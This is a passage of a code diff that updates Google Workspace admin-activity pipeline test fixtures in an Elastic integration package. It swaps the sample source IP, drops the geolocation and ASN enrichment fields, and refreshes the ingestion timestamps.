"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:25.433476300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_BUILDING", "id": "1", @@ -256,7 +202,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -280,35 +226,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375134300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:25.433482200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CREATE_CALENDAR_RESOURCE", "id": "1", @@ -338,7 +266,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -362,35 +290,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375138900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:25.433486400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "DELETE_CALENDAR_RESOURCE", "id": "1", @@ -420,7 +330,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -444,35 +354,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375143900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:25.433491100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CREATE_CALENDAR_RESOURCE_FEATURE", "id": "1", @@ -502,7 +394,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -526,35 +418,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375148500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:25.433496600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "DELETE_CALENDAR_RESOURCE_FEATURE", "id": "1", @@ -584,7 +458,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -608,35 +482,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375152700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:25.433502Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_CALENDAR_RESOURCE_FEATURE", "id": "1", @@ -667,7 +523,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -691,35 +547,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375189700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RENAME_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:25.433507100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RENAME_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "RENAME_CALENDAR_RESOURCE", "id": "1", @@ -749,7 +587,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -773,35 +611,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375196500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:25.433512700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_CALENDAR_RESOURCE", "id": "1", @@ -831,7 +651,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -855,35 +675,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375201400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CHANGE_CALENDAR_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:25.433517300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CHANGE_CALENDAR_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CALENDAR_SETTING", "id": "1", @@ -915,7 +717,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -939,35 +741,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375206900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CANCEL_CALENDAR_EVENTS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:25.433520800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CANCEL_CALENDAR_EVENTS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CANCEL_CALENDAR_EVENTS", "id": "1", @@ -1003,7 +787,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1027,35 +811,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375211800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RELEASE_CALENDAR_RESOURCES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:25.433542300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RELEASE_CALENDAR_RESOURCES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RELEASE_CALENDAR_RESOURCES", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log index b078b332402..164c64906f5 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log @@ -1,4 +1,4 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_CREATE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_DELETE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_MODIFY_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"CHANGE_CHAT_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_CREATE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_DELETE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_MODIFY_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"CHANGE_CHAT_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json index 0066b91141e..db163f62692 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.821562500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_CREATE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", + "ingested": "2021-12-09T13:38:27.141313500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_CREATE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "provider": "admin", "action": "MEET_INTEROP_CREATE_GATEWAY", "id": "1", @@ -92,7 +74,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -116,35 +98,17 @@ "id": "1" }, "source": { - "geo": { - 